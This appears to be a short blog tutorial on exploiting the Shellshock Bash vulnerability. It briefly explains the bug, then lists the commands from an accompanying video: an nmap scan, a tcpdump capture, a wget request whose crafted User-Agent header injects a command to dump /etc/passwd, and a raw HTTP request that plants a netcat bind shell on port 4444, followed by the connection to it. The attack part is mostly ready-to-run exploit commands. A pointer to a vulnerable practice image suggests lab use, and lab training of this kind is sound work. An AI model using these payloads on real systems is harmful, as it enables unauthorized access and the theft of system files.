Performing a shellshock attack

What is shellshock?

Shellshock, also known as Bashdoor, is a family of security bugs in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests,

allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system.

What is the exploit process of this vulnerability?

Well, this video shows how to get access to a server through shellshock

Commands that has been used in the video:

  • Scanning target open ports and services with nmap
    • nmap -sV -sC -p 80 –stats-every 3s <TARGET>
  • Sniffing the network traffic data with tcpdump
    • tcpdump -n host <TARGET>
  • Trying to execute command remotely on the server and grabbing /etc/passwd file content
    • wget -U “() { test;};echo \”Content-type: text/plain\”; echo; echo; /bin/cat /etc/passwd” http://<TARGET>/cgi-bin/status
  • Try to execute a bind shell on the infected server with netcat listener
    • ¬†echo -e “HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 4444 -e /bin/sh\r\nHost: <TARGET>\r\nConnection: close\r\n\r\n” | nc <TARGET> 80
  • Connect the bind shell with netcat
    • nc <TARGET> 4444

Vulnerable server to test the exploit:

You can download the iso image and test it from Here

The following two tabs change content below.


Latest posts by captain_midnight (see all)


Leave a Reply